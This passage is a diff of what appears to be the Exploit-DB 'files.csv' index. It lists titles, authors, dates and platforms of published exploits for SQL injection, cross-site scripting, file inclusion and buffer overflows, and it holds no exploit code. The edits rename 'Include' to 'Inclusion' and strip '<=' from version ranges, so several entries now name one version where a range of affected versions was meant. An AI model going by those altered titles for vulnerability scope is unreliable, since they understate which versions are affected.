'__get_argv()' and '__get_compat_argv()' Local Memory Corruption Vulnerabilities",2010-02-05,"Josh Stone",linux,local,0 -33605,platforms/php/webapps/33605.php,"ASCET Interactive Huski CMS 'i' Parameter Local File Include",2010-02-05,Wireghoul,php,webapps,0 +33605,platforms/php/webapps/33605.php,"ASCET Interactive Huski CMS 'i' Parameter Local File Inclusion",2010-02-05,Wireghoul,php,webapps,0 33606,platforms/php/webapps/33606.txt,"ASCET Interactive Huski Retail Multiple SQL Injection Vulnerabilities",2010-02-05,Wireghoul,php,webapps,0 33607,platforms/multiple/dos/33607.html,"Mozilla Firefox 3.5.x and SeaMonkey 2.0.1 - Remote Denial Of Service",2010-02-07,"599eme Man",multiple,dos,0 33608,platforms/windows/dos/33608.html,"Apple Safari 4.0.4 - Remote Denial Of Service",2010-02-07,"599eme Man",windows,dos,0 @@ -30298,12 +30298,12 @@ id,file,description,date,author,platform,type,port 33617,platforms/php/webapps/33617.txt,"Aflam Online 1.0 - 'index.php' SQL Injection",2010-02-08,alnjm33,php,webapps,0 33618,platforms/php/webapps/33618.txt,"Zen Time Tracking 2.2 - Multiple SQL Injection Vulnerabilities",2010-02-08,"cr4wl3r ",php,webapps,0 33619,platforms/php/webapps/33619.txt,"VideoDB 3.0.3 - 'login.php' Cross-Site Scripting",2010-02-08,vr,php,webapps,0 -33620,platforms/linux/remote/33620.txt,"Helix Player <= 11.0.2 Encoded URI Processing Buffer Overflow",2007-07-03,gwright,linux,remote,0 +33620,platforms/linux/remote/33620.txt,"Helix Player 11.0.2 Encoded URI Processing Buffer Overflow",2007-07-03,gwright,linux,remote,0 33621,platforms/php/webapps/33621.txt,"vBulletin Adsense Component - 'viewpage.php' SQL Injection",2010-02-09,JIKO,php,webapps,0 33622,platforms/linux/remote/33622.txt,"Accellion File Transfer Appliance web_client_user_guide.html lang Parameter Traversal Arbitrary File Access",2010-02-10,"Tim Brown",linux,remote,0 33623,platforms/linux/local/33623.txt,"Accellion Secure File Transfer Appliance - Multiple Command Restriction Weakness Local Privilege Escalation",2010-02-10,"Tim Brown",linux,local,0 -33624,platforms/php/webapps/33624.txt,"vBulletin <= 3.5.4 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-11,ROOT_EGY,php,webapps,0 -33625,platforms/php/dos/33625.php,"PHP <= 5.3.1 - 'session_save_path()' 'safe_mode' Restriction-Bypass",2010-02-11,"Grzegorz Stachowiak",php,dos,0 +33624,platforms/php/webapps/33624.txt,"vBulletin 3.5.4 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-11,ROOT_EGY,php,webapps,0 +33625,platforms/php/dos/33625.php,"PHP 5.3.1 - 'session_save_path()' 'safe_mode' Restriction-Bypass",2010-02-11,"Grzegorz Stachowiak",php,dos,0 33626,platforms/php/webapps/33626.txt,"PHPBTTracker+ 2.2 - SQL Injection",2014-06-03,"BackBox Linux Team",php,webapps,80 33627,platforms/ios/webapps/33627.txt,"NG WifiTransfer Pro 1.1 - Local File Inclusion",2014-06-03,Vulnerability-Lab,ios,webapps,8080 33628,platforms/ios/webapps/33628.txt,"Files Desk Pro 1.4 iOS - Local File Inclusion",2014-06-03,Vulnerability-Lab,ios,webapps,8081 @@ -30315,16 +30315,16 @@ id,file,description,date,author,platform,type,port 33644,platforms/php/webapps/33644.txt,"Basic-CMS 'nav_id' Parameter Cross-Site Scripting",2010-02-12,Red-D3v1L,php,webapps,0 33641,platforms/php/webapps/33641.txt,"Joomla! F!BB Component 1.5.96 RC SQL Injection and HTML Injection Vulnerabilities",2009-09-17,"Jeff Channell",php,webapps,0 33642,platforms/windows/remote/33642.html,"Symantec Multiple Products - Client Proxy ActiveX (CLIproxy.dll) Remote Overflow",2010-02-17,"Alexander Polyakov",windows,remote,0 -33643,platforms/php/webapps/33643.txt,"CMS Made Simple 1.6.6 - Local File Include and Cross-Site Scripting Vulnerabilities",2010-02-12,"Beenu Arora",php,webapps,0 +33643,platforms/php/webapps/33643.txt,"CMS Made Simple 1.6.6 - Local File Inclusion and Cross-Site Scripting Vulnerabilities",2010-02-12,"Beenu Arora",php,webapps,0 33647,platforms/asp/webapps/33647.txt,"Portrait Software Portrait Campaign Manager 4.6.1.22 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-16,"Roel Schouten",asp,webapps,0 33648,platforms/hardware/remote/33648.txt,"Huawei HG510 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-02-16,"Ivan Markovic",hardware,remote,0 33649,platforms/php/webapps/33649.txt,"BGSvetionik BGS CMS 'search' Parameter Cross-Site Scripting",2010-02-16,hacker@sr.gov.yu,php,webapps,0 33650,platforms/php/webapps/33650.txt,"Extreme Mobster 'login' Parameter Cross-Site Scripting",2010-02-16,indoushka,php,webapps,0 33651,platforms/php/webapps/33651.txt,"EziScript Google Page Rank 1.1 - Cross-Site Scripting",2010-02-16,sarabande,php,webapps,0 -33652,platforms/php/webapps/33652.txt,"New-CMS 1.08 - Multiple Local File Include and HTML-Injection Vulnerabilities",2010-02-18,"Alberto Fontanella",php,webapps,0 +33652,platforms/php/webapps/33652.txt,"New-CMS 1.08 - Multiple Local File Inclusion and HTML-Injection Vulnerabilities",2010-02-18,"Alberto Fontanella",php,webapps,0 33653,platforms/multiple/remote/33653.txt,"PortWise SSL VPN 4.6 - 'reloadFrame' Parameter Cross-Site Scripting",2010-02-18,"George Christopoulos",multiple,remote,0 -33654,platforms/php/webapps/33654.py,"Madness Pro <= 1.14 - Persistent XSS",2014-06-06,bwall,php,webapps,0 -33655,platforms/php/webapps/33655.py,"Madness Pro <= 1.14 - SQL Injection",2014-06-06,bwall,php,webapps,0 +33654,platforms/php/webapps/33654.py,"Madness Pro 1.14 - Persistent XSS",2014-06-06,bwall,php,webapps,0 +33655,platforms/php/webapps/33655.py,"Madness Pro 1.14 - SQL Injection",2014-06-06,bwall,php,webapps,0 33656,platforms/php/webapps/33656.txt,"XlentProjects SphereCMS 1.1 - 'archive.php' SQL Injection",2010-02-18,"AmnPardaz Security Research Team",php,webapps,0 33657,platforms/php/webapps/33657.txt,"Subex Nikira Fraud Management System GUI 'message' Parameter Cross-Site Scripting",2010-02-18,thebluegenius,php,webapps,0 33658,platforms/php/webapps/33658.txt,"Social Web CMS 2 - 'index.php' Cross-Site Scripting",2010-02-19,GoLdeN-z3r0,php,webapps,0 @@ -30333,31 +30333,31 @@ id,file,description,date,author,platform,type,port 33661,platforms/php/webapps/33661.txt,"Galerie Dezign-Box Multiple Input Validation Vulnerabilities",2010-02-22,indoushka,php,webapps,0 33662,platforms/windows/remote/33662.txt,"WampServer 2.0i lang Parameter Cross-Site Scripting",2010-02-22,"Gjoko Krstic",windows,remote,0 33663,platforms/multiple/remote/33663.txt,"IBM WebSphere Portal 6.0.1.5 Build wp6015 Portlet Palette Search HTML Injection",2010-02-19,"Sjoerd Resink",multiple,remote,0 -33664,platforms/multiple/remote/33664.html,"Mozilla Firefox <= 3.5.8 Style Sheet Redirection Information Disclosure",2010-01-09,"Cesar Cerrudo",multiple,remote,0 +33664,platforms/multiple/remote/33664.html,"Mozilla Firefox 3.5.8 Style Sheet Redirection Information Disclosure",2010-01-09,"Cesar Cerrudo",multiple,remote,0 33665,platforms/php/webapps/33665.txt,"Softbiz Jobs 'sbad_type' Parameter Cross-Site Scripting",2010-02-23,"pratul agrawal",php,webapps,0 33713,platforms/windows/dos/33713.py,"Core FTP LE 2.2 - Heap Overflow PoC",2014-06-11,"Gabor Seljan",windows,dos,0 33675,platforms/jsp/webapps/33675.txt,"Multiple IBM Products Login Page Cross-Site Scripting",2010-02-25,"Oren Hafif",jsp,webapps,0 33676,platforms/php/webapps/33676.txt,"Newbie CMS 0.0.2 Insecure Cookie Authentication Bypass",2010-02-25,JIKO,php,webapps,0 -33677,platforms/php/dos/33677.txt,"PHP <= 5.3.1 - LCG Entropy Security",2010-02-26,Rasmus,php,dos,0 +33677,platforms/php/dos/33677.txt,"PHP 5.3.1 - LCG Entropy Security",2010-02-26,Rasmus,php,dos,0 33678,platforms/jsp/webapps/33678.txt,"ARISg 5.0 - 'wflogin.jsp' Cross-Site Scripting",2010-02-26,"Yaniv Miron",jsp,webapps,0 33672,platforms/linux/dos/33672.txt,"Kojoney 0.0.4.1 - 'urllib.urlopen()' Remote Denial of Service",2010-02-24,Nicob,linux,dos,0 33673,platforms/php/webapps/33673.pl,"HD FLV Player Component for Joomla! 'id' Parameter SQL Injection",2010-02-24,kaMtiEz,php,webapps,0 -33674,platforms/php/webapps/33674.txt,"OpenInferno OI.Blogs 1.0 - Multiple Local File Include Vulnerabilities",2010-02-24,JIKO,php,webapps,0 +33674,platforms/php/webapps/33674.txt,"OpenInferno OI.Blogs 1.0 - Multiple Local File Inclusion Vulnerabilities",2010-02-24,JIKO,php,webapps,0 33679,platforms/php/webapps/33679.txt,"TRUC 0.11 - 'login_reset_password_page.php' Cross-Site Scripting",2010-02-28,snakespc,php,webapps,0 -33680,platforms/php/webapps/33680.txt,"Open Educational System 0.1 beta - 'CONF_INCLUDE_PATH' Parameter Multiple Remote File Include Vulnerabilities",2010-02-28,"cr4wl3r ",php,webapps,0 +33680,platforms/php/webapps/33680.txt,"Open Educational System 0.1 beta - 'CONF_INCLUDE_PATH' Parameter Multiple Remote File Inclusion Vulnerabilities",2010-02-28,"cr4wl3r ",php,webapps,0 33681,platforms/php/webapps/33681.txt,"SLAED CMS 4 Installation Script Unauthorized Access",2010-02-27,indoushka,php,webapps,0 33682,platforms/multiple/remote/33682.txt,"Oracle Siebel 7.7/7.8 - 'loyalty_enu/start.swe' Cross-Site Scripting",2010-03-01,Lament,multiple,remote,0 -33683,platforms/php/webapps/33683.txt,"Article Friendly 'filename' Parameter Local File Include",2010-03-01,"pratul agrawal",php,webapps,0 +33683,platforms/php/webapps/33683.txt,"Article Friendly 'filename' Parameter Local File Inclusion",2010-03-01,"pratul agrawal",php,webapps,0 33684,platforms/php/webapps/33684.txt,"Blax Blog 0.1 - 'girisyap.php' SQL Injection",2010-03-01,"cr4wl3r ",php,webapps,0 33685,platforms/php/webapps/33685.html,"DeDeCMS 5.5 - '_SESSION[dede_admin_id]' Parameter Authentication Bypass",2010-03-01,"Wolves Security Team",php,webapps,0 33686,platforms/multiple/remote/33686.txt,"IBM Lotus Domino 7.0.2 - 'readme.nsf' Cross-Site Scripting",2010-03-02,"Nahuel Grisolia",multiple,remote,0 33687,platforms/java/webapps/33687.txt,"Sparta Systems TrackWise EQms Multiple Cross-Site Scripting Vulnerabilities",2010-03-02,"Yaniv Miron",java,webapps,0 33688,platforms/php/webapps/33688.txt,"Discuz! 6.0 - 'uid' Parameter Cross-Site Scripting",2010-03-02,"lis cker",php,webapps,0 -33689,platforms/multiple/remote/33689.as,"Adobe Flash Player <= 10.1.51 - Local File Access Information Disclosure",2010-03-03,"lis cker",multiple,remote,0 +33689,platforms/multiple/remote/33689.as,"Adobe Flash Player 10.1.51 - Local File Access Information Disclosure",2010-03-03,"lis cker",multiple,remote,0 33690,platforms/php/webapps/33690.txt,"DosyaYukle Scripti 1.0 - Remote File Upload",2010-03-03,indoushka,php,webapps,0 33691,platforms/jsp/webapps/33691.txt,"Comptel Provisioning and Activation 'error_msg_parameter' Cross-Site Scripting",2010-03-04,thebluegenius,jsp,webapps,0 -33707,platforms/windows/dos/33707.txt,"Orb Networks <= 2.54.18 - Orb Direct Show Filter MP3 File Divide-By-Zero Denial of Service",2010-03-04,"Matthew Bergin",windows,dos,0 -33708,platforms/bsd/dos/33708.c,"FreeBSD <= 8.0 and OpenBSD 4.x - 'ftpd' NULL Pointer Dereference Denial Of Service",2010-03-05,kingcope,bsd,dos,0 +33707,platforms/windows/dos/33707.txt,"Orb Networks 2.54.18 - Orb Direct Show Filter MP3 File Divide-By-Zero Denial of Service",2010-03-04,"Matthew Bergin",windows,dos,0 +33708,platforms/bsd/dos/33708.c,"FreeBSD 8.0 and OpenBSD 4.x - 'ftpd' NULL Pointer Dereference Denial Of Service",2010-03-05,kingcope,bsd,dos,0 33705,platforms/windows/remote/33705.txt,"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities",2010-03-04,"Nikolas Sotiriu",windows,remote,0 33706,platforms/php/webapps/33706.txt,"Drupal < 6.16 / 5.22 - Multiple Security Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0 33704,platforms/asp/webapps/33704.txt,"BBSXP 2008 - 'ShowPost.asp' Cross-Site Scripting",2010-03-04,Liscker,asp,webapps,0 @@ -30367,15 +30367,15 @@ id,file,description,date,author,platform,type,port 33702,platforms/php/webapps/33702.txt,"ZeroCMS 1.0 - (zero_view_article.php article_id param) SQL Injection",2014-06-10,LiquidWorm,php,webapps,80 33714,platforms/php/webapps/33714.txt,"SHOUTcast DNAS 2.2.1 - Stored XSS",2014-06-11,rob222,php,webapps,0 33715,platforms/asp/webapps/33715.txt,"Spectrum Software WebManager CMS 'pojam' Parameter Cross-Site Scripting",2010-03-05,hacker@sr.gov.yu,asp,webapps,0 -33716,platforms/php/webapps/33716.txt,"Saskia's Shopsystem 'id' Parameter Local File Include",2010-03-05,"cr4wl3r ",php,webapps,0 +33716,platforms/php/webapps/33716.txt,"Saskia's Shopsystem 'id' Parameter Local File Inclusion",2010-03-05,"cr4wl3r ",php,webapps,0 33717,platforms/multiple/webapps/33717.txt,"Six Apart Vox - 'search' Page Cross-Site Scripting",2010-03-05,Phenom,multiple,webapps,0 33838,platforms/windows/dos/33838.py,"Mocha W32 LPD 1.9 - Remote Buffer Overflow",2010-04-15,mr_me,windows,dos,0 33711,platforms/windows/dos/33711.txt,"BS.Player 2.51 - (.mp3) Buffer Overflow",2010-03-05,"Gjoko Krstic",windows,dos,0 33712,platforms/windows/remote/33712.txt,"VLC Media Player 1.0.x - Bookmark Creation Buffer Overflow",2010-03-05,"Gjoko Krstic",windows,remote,0 -33718,platforms/php/webapps/33718.txt,"phpCOIN 1.2.1 - 'mod' Parameter Local File Include",2010-03-06,_mlk_,php,webapps,0 +33718,platforms/php/webapps/33718.txt,"phpCOIN 1.2.1 - 'mod' Parameter Local File Inclusion",2010-03-06,_mlk_,php,webapps,0 33719,platforms/windows/dos/33719.py,"Microsoft Windows XP/Vista - (.ani) 'tagBITMAPINFOHEADER' Denial of Service",2010-03-08,Skylined,windows,dos,0 33720,platforms/asp/webapps/33720.txt,"Pre E-Learning Portal 'search_result.asp' SQL Injection",2010-03-08,NoGe,asp,webapps,0 -33721,platforms/asp/webapps/33721.txt,"Max Network Technology BBSMAX <= 4.2 - 'post.aspx' Cross-Site Scripting",2010-03-08,Liscker,asp,webapps,0 +33721,platforms/asp/webapps/33721.txt,"Max Network Technology BBSMAX 4.2 - 'post.aspx' Cross-Site Scripting",2010-03-08,Liscker,asp,webapps,0 33722,platforms/asp/webapps/33722.txt,"ASPCode CMS 1.5.8 - 'default.asp' Multiple Cross-Site Scripting Vulnerabilities",2010-03-08,"Alberto Fontanella",asp,webapps,0 33723,platforms/php/webapps/33723.html,"KDPics 1.18 - 'admin/index.php' Authentication Bypass",2010-03-08,snakespc,php,webapps,0 33724,platforms/php/webapps/33724.txt,"OpenCart 1.3.2 - 'page' Parameter SQL Injection",2010-03-07,"Andrés Gómez",php,webapps,0 @@ -30383,8 +30383,8 @@ id,file,description,date,author,platform,type,port 33726,platforms/php/webapps/33726.txt,"TikiWik < 4.2 - Multiple Vulnerabilities",2010-03-09,"Mateusz Drygas",php,webapps,0 33727,platforms/php/webapps/33727.txt,"wh-em.com upload 7.0 Insecure Cookie Authentication Bypass",2010-02-16,indoushka,php,webapps,0 33728,platforms/asp/webapps/33728.txt,"IBM ENOVIA SmarTeam 'LoginPage.aspx' Cross-Site Scripting",2010-03-09,Lament,asp,webapps,0 -33729,platforms/multiple/dos/33729.txt,"PostgreSQL <= 8.4.1 JOIN Hashtable Size Integer Overflow Denial Of Service",2014-06-13,"Bernt Marius Johnsen",multiple,dos,0 -33730,platforms/asp/webapps/33730.txt,"Max Network Technology BBSMAX <= 4.2 - 'threadid' Parameter Cross-Site Scripting",2010-03-10,Liscker,asp,webapps,0 +33729,platforms/multiple/dos/33729.txt,"PostgreSQL 8.4.1 JOIN Hashtable Size Integer Overflow Denial Of Service",2014-06-13,"Bernt Marius Johnsen",multiple,dos,0 +33730,platforms/asp/webapps/33730.txt,"Max Network Technology BBSMAX 4.2 - 'threadid' Parameter Cross-Site Scripting",2010-03-10,Liscker,asp,webapps,0 33731,platforms/multiple/webapps/33731.txt,"Friendly Technologies TR-069 ACS 2.8.9 Login SQL Injection",2010-03-10,"Yaniv Miron",multiple,webapps,0 33732,platforms/php/webapps/33732.txt,"60cycleCMS - 'select.php' Multiple HTML Injection Vulnerabilities",2010-03-10,"pratul agrawal",php,webapps,0 33733,platforms/windows/dos/33733.pl,"httpdx 1.5.3 PNG File Handling Remote Denial of Service",2010-03-10,"Jonathan Salwan",windows,dos,0 @@ -30399,26 +30399,26 @@ id,file,description,date,author,platform,type,port 33741,platforms/hardware/remote/33741.txt,"Yealink VoIP Phone SIP-T38G - Remote Command Execution",2014-06-13,Mr.Un1k0d3r,hardware,remote,0 33742,platforms/hardware/remote/33742.txt,"Yealink VoIP Phone SIP-T38G - Privileges Escalation",2014-06-13,Mr.Un1k0d3r,hardware,remote,0 33743,platforms/php/webapps/33743.py,"ZeroCMS 1.0 - zero_transact_user.php Handling Privilege Escalation",2014-06-13,"Tiago Carvalho",php,webapps,0 -33759,platforms/multiple/webapps/33759.txt,"DirectAdmin <= 1.33.6 - 'CMD_DB_VIEW' Cross-Site Scripting",2010-03-14,r0t,multiple,webapps,0 +33759,platforms/multiple/webapps/33759.txt,"DirectAdmin 1.33.6 - 'CMD_DB_VIEW' Cross-Site Scripting",2010-03-14,r0t,multiple,webapps,0 33748,platforms/php/webapps/33748.txt,"AneCMS 1.0 - 'index.php' Multiple HTML Injection Vulnerabilities",2010-03-11,"pratul agrawal",php,webapps,0 33749,platforms/php/webapps/33749.txt,"ARTIS ABTON CMS - Multiple SQL Injection Vulnerabilities",2010-03-11,MustLive,php,webapps,0 33750,platforms/windows/remote/33750.txt,"Microsoft Windows XP/2000 - Help File Relative Path Remote Command Execution",2010-03-06,Secumania,windows,remote,0 -33751,platforms/php/webapps/33751.txt,"CodeIgniter 1.0 - 'BASEPATH' Multiple Remote File Include Vulnerabilities",2010-03-11,eidelweiss,php,webapps,0 +33751,platforms/php/webapps/33751.txt,"CodeIgniter 1.0 - 'BASEPATH' Multiple Remote File Inclusion Vulnerabilities",2010-03-11,eidelweiss,php,webapps,0 33752,platforms/linux/remote/33752.html,"WebKit 1.2.x Right-to-Left Displayed Text Handling Memory Corruption",2010-03-11,wushi,linux,remote,0 33753,platforms/php/webapps/33753.txt,"Easynet4u Forum Host 'topic.php' SQL Injection",2010-03-12,Pr0T3cT10n,php,webapps,0 33754,platforms/php/webapps/33754.txt,"pMyAdmin 3.3.5.1 - 'db_create.php' Cross-Site Scripting",2010-03-12,Liscker,php,webapps,0 -33755,platforms/php/dos/33755.php,"PHP <= 5.3.2 xmlrpc Extension - Multiple Remote Denial of Service Vulnerabilities",2010-03-12,"Auke van Slooten",php,dos,0 +33755,platforms/php/dos/33755.php,"PHP 5.3.2 xmlrpc Extension - Multiple Remote Denial of Service Vulnerabilities",2010-03-12,"Auke van Slooten",php,dos,0 33756,platforms/php/webapps/33756.txt,"Joomla! 'com_seek' Component - 'id' Parameter SQL Injection",2010-03-13,"DevilZ TM",php,webapps,0 33757,platforms/php/webapps/33757.txt,"Joomla! 'com_d-greinar' Component - 'maintree' Parameter Cross-Site Scripting",2010-03-13,"DevilZ TM",php,webapps,0 33758,platforms/asp/webapps/33758.txt,"Zigurrat Farsi CMS 'manager/textbox.asp' SQL Injection",2010-03-15,Isfahan,asp,webapps,0 33762,platforms/php/webapps/33762.txt,"Andromeda 1.9.2 - 's' Parameter Cross-Site Scripting and Session Fixation Vulnerabilities",2010-03-15,indoushka,php,webapps,0 33763,platforms/php/webapps/33763.txt,"Domain Verkaus & Auktions Portal 'index.php' SQL Injection",2010-03-15,"Easy Laster",php,webapps,0 -33764,platforms/multiple/webapps/33764.txt,"Dojo Toolkit <= 1.4.1 dijit\tests\_testCommon.js theme Parameter XSS",2010-03-15,"Adam Bixby",multiple,webapps,0 -33765,platforms/multiple/webapps/33765.txt,"Dojo Toolkit <= 1.4.1 doh\runner.html Multiple Parameter XSS",2010-03-15,"Adam Bixby",multiple,webapps,0 +33764,platforms/multiple/webapps/33764.txt,"Dojo Toolkit 1.4.1 dijit\tests\_testCommon.js theme Parameter XSS",2010-03-15,"Adam Bixby",multiple,webapps,0 +33765,platforms/multiple/webapps/33765.txt,"Dojo Toolkit 1.4.1 doh\runner.html Multiple Parameter XSS",2010-03-15,"Adam Bixby",multiple,webapps,0 33766,platforms/php/webapps/33766.txt,"Joomla! 'com_as' Component - 'catid' Parameter SQL Injection",2010-03-16,N2n-Hacker,php,webapps,0 33767,platforms/novell/remote/33767.rb,"Novell eDirectory 8.8.5 DHost Weak Session Cookie Session Hijacking",2010-03-14,Metasploit,novell,remote,0 33787,platforms/php/webapps/33787.txt,"RepairShop2 index.php Prod Parameter XSS",2010-03-23,kaMtiEz,php,webapps,0 -33769,platforms/php/webapps/33769.txt,"eFront 3.5.5 - 'langname' Parameter Local File Include",2010-03-17,7Safe,php,webapps,0 +33769,platforms/php/webapps/33769.txt,"eFront 3.5.5 - 'langname' Parameter Local File Inclusion",2010-03-17,7Safe,php,webapps,0 33770,platforms/windows/dos/33770.txt,"Microsoft Windows Media Player 11 - AVI File Colorspace Conversion Remote Memory Corruption",2010-03-17,ITSecTeam,windows,dos,0 33771,platforms/php/webapps/33771.txt,"Joomla! 'com_alert' Component - 'q_item' Parameter SQL Injection",2010-03-17,N2n-Hacker,php,webapps,0 33772,platforms/php/webapps/33772.txt,"phpBB2 Plus 1.53 - 'kb.php' SQL Injection",2010-03-17,Gamoscu,php,webapps,0 @@ -30430,7 +30430,7 @@ id,file,description,date,author,platform,type,port 33778,platforms/windows/dos/33778.pl,"Remote Help HTTP 0.0.7 GET Request Format String Denial Of Service",2010-03-20,Rick2600,windows,dos,0 33779,platforms/jsp/webapps/33779.txt,"agXchange ESM 'ucschcancelproc.jsp' Open Redirection",2010-03-22,Lament,jsp,webapps,0 33780,platforms/multiple/remote/33780.txt,"IBM Lotus Notes 6.5.x - 'names.nsf' Cross-Site Scripting",2010-03-19,Lament,multiple,remote,0 -33781,platforms/php/webapps/33781.txt,"Lussumo Vanilla <= 1.1.10 - 'definitions.php' Multiple Remote File Include Vulnerabilities",2010-03-23,eidelweiss,php,webapps,0 +33781,platforms/php/webapps/33781.txt,"Lussumo Vanilla 1.1.10 - 'definitions.php' Multiple Remote File Inclusion Vulnerabilities",2010-03-23,eidelweiss,php,webapps,0 33782,platforms/php/webapps/33782.txt,"PHPKIT 1.6.x - 'b-day.php' Addon SQL Injection",2010-03-22,n3w7u,php,webapps,0 33783,platforms/linux/remote/33783.txt,"Astaro Security Linux 5 - 'index.fpl' Cross-Site Scripting",2010-03-23,"Vincent Hautot",linux,remote,0 33784,platforms/php/webapps/33784.txt,"vBulletin 4.0.2 - Search Cross-Site Scripting",2010-03-19,5ubzer0,php,webapps,0 @@ -30445,7 +30445,7 @@ id,file,description,date,author,platform,type,port 33794,platforms/php/webapps/33794.txt,"Multiple SpringSource Products Multiple HTML Injection Vulnerabilities",2010-03-23,"Aaron Kulick",php,webapps,0 33795,platforms/php/webapps/33795.txt,"Joomla! 'com_aml_2' Component - 'art' Parameter SQL Injection",2010-03-23,Metropolis,php,webapps,0 33796,platforms/php/webapps/33796.txt,"Joomla! 'com_cb' Component - 'cat' Parameter SQL Injection",2010-03-23,"DevilZ TM",php,webapps,0 -33797,platforms/php/webapps/33797.txt,"Joomla! 'com_jresearch' Component - 'controller' Parameter Local File Include",2010-03-24,"Chip d3 bi0s",php,webapps,0 +33797,platforms/php/webapps/33797.txt,"Joomla! 'com_jresearch' Component - 'controller' Parameter Local File Inclusion",2010-03-24,"Chip d3 bi0s",php,webapps,0 33798,platforms/linux/remote/33798.html,"Mozilla Firefox 3.6 Image Preloading Content-Policy Check Security Bypass",2010-03-18,"Josh Soref",linux,remote,0 33799,platforms/solaris/local/33799.sh,"Sun Connection Update Manager for Solaris Multiple Insecure Temporary File Creation Vulnerabilities",2010-03-24,"Larry W. Cashdollar",solaris,local,0 33800,platforms/multiple/dos/33800.html,"Mozilla Firefox 3.6 - 'gfxTextRun::SanitizeGlyphRuns()' Remote Memory Corruption",2010-03-24,"Jesse Ruderman",multiple,dos,0 @@ -30463,18 +30463,18 @@ id,file,description,date,author,platform,type,port 33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch Malformed Webpage Remote Code Execution",2010-03-26,"Nishant Das Patnaik",osx,remote,0 33812,platforms/php/webapps/33812.txt,"Joomla! 'com_weblinks' Component - 'id' Parameter SQL Injection",2010-03-29,"Pouya Daneshmand",php,webapps,0 33813,platforms/php/webapps/33813.html,"Fuctweb CapCC Plugin 1.0 for WordPress - 'plugins.php' SQL Injection",2008-12-13,MustLive,php,webapps,0 -33814,platforms/php/webapps/33814.txt,"Piwik <= 0.5.5 - 'form_url' Parameter Cross-Site Scripting",2010-03-31,garwga,php,webapps,0 +33814,platforms/php/webapps/33814.txt,"Piwik 0.5.5 - 'form_url' Parameter Cross-Site Scripting",2010-03-31,garwga,php,webapps,0 33815,platforms/php/webapps/33815.txt,"OSSIM 2.2.1 - '$_SERVER['PHP_SELF']' Parameter Cross-Site Scripting",2010-03-31,"CONIX Security",php,webapps,0 -33816,platforms/multiple/remote/33816.pl,"Miranda IM <= 0.8.16 Information Disclosure",2010-04-06,"Jan Schejbal",multiple,remote,0 +33816,platforms/multiple/remote/33816.pl,"Miranda IM 0.8.16 Information Disclosure",2010-04-06,"Jan Schejbal",multiple,remote,0 33817,platforms/windows/remote/33817.rb,"Ericom AccessNow Server Buffer Overflow",2014-06-19,Metasploit,windows,remote,8080 33818,platforms/php/webapps/33818.txt,"web2Project 3.1 - Multiple Vulnerabilities",2014-06-19,"High-Tech Bridge SA",php,webapps,80 33819,platforms/windows/dos/33819.txt,"McAfee Email Gateway < 6.7.2 Hotfix 2 - Multiple Vulnerabilities",2010-04-06,"Nahuel Grisolia",windows,dos,0 -33820,platforms/php/webapps/33820.txt,"PotatoNews 1.0.2 - 'nid' Parameter Multiple Local File Include Vulnerabilities",2010-04-07,mat,php,webapps,0 -33821,platforms/php/webapps/33821.html,"n-cms-equipe 1.1c.Debug Multiple Local File Include Vulnerabilities",2010-02-24,ITSecTeam,php,webapps,0 +33820,platforms/php/webapps/33820.txt,"PotatoNews 1.0.2 - 'nid' Parameter Multiple Local File Inclusion Vulnerabilities",2010-04-07,mat,php,webapps,0 +33821,platforms/php/webapps/33821.html,"n-cms-equipe 1.1c.Debug Multiple Local File Inclusion Vulnerabilities",2010-02-24,ITSecTeam,php,webapps,0 33822,platforms/hardware/webapps/33822.sh,"D-link DSL-2760U-E1 - Persistent XSS",2014-06-21,"Yuval tisf Nativ",hardware,webapps,0 33852,platforms/windows/remote/33852.txt,"HTTP 1.1 GET Request Directory Traversal",2010-06-20,chr1x,windows,remote,0 33853,platforms/php/webapps/33853.txt,"Kleophatra CMS 0.1.1 - 'module' Parameter Cross-Site Scripting",2010-04-19,anT!-Tr0J4n,php,webapps,0 -33824,platforms/linux/local/33824.c,"Linux Kernel <= 3.13 - Local Privilege Escalation PoC (gid)",2014-06-21,"Vitaly Nikolenko",linux,local,0 +33824,platforms/linux/local/33824.c,"Linux Kernel 3.13 - Local Privilege Escalation PoC (gid)",2014-06-21,"Vitaly Nikolenko",linux,local,0 33825,platforms/asp/webapps/33825.txt,"Ziggurat Farsi CMS 'id' Parameter Unspecified Cross-Site Scripting",2010-04-15,"Pouya Daneshmand",asp,webapps,0 33826,platforms/linux/remote/33826.txt,"TCPDF 4.5.036/4.9.5 - 'params' Attribute Remote Code Execution Weakness",2010-04-08,apoc,linux,remote,0 33827,platforms/php/webapps/33827.txt,"Istgah For Centerhost 'view_ad.php' Cross-Site Scripting",2010-04-07,indoushka,php,webapps,0 @@ -30483,7 +30483,7 @@ id,file,description,date,author,platform,type,port 33832,platforms/php/webapps/33832.txt,"TANDBERG Video Communication Server 4.2.1/4.3.0 - Multiple Remote Vulnerabilities",2010-04-12,"Jon Hart",php,webapps,0 33833,platforms/php/webapps/33833.txt,"Blog System 1.x - Multiple Input Validation Vulnerabilities",2010-04-12,"cp77fk4r ",php,webapps,0 33834,platforms/php/webapps/33834.txt,"Vana CMS 'filename' Parameter Remote File Download",2010-04-13,"Pouya Daneshmand",php,webapps,0 -33835,platforms/php/webapps/33835.txt,"AneCMS 1.0 - Multiple Local File Include Vulnerabilities",2010-04-12,"AmnPardaz Security Research Team",php,webapps,0 +33835,platforms/php/webapps/33835.txt,"AneCMS 1.0 - Multiple Local File Inclusion Vulnerabilities",2010-04-12,"AmnPardaz Security Research Team",php,webapps,0 33836,platforms/windows/shellcode/33836.txt,"Windows - Add Admin User _BroK3n_ Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",windows,shellcode,0 33839,platforms/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 - 'jtfwcpnt.jsp' SQL Injection",2010-04-15,"Joxean Koret",multiple,remote,0 33840,platforms/asp/webapps/33840.txt,"Ziggurrat Farsi CMS 'bck' Parameter Directory Traversal",2010-04-15,"Pouya Daneshmand",asp,webapps,0 @@ -30505,9 +30505,9 @@ id,file,description,date,author,platform,type,port 33855,platforms/linux/remote/33855.txt,"MIT Kerberos 5 - 'src/kdc/do_tgs_req.c' Ticket Renewal Double Free Memory Corruption",2010-04-20,"Joel 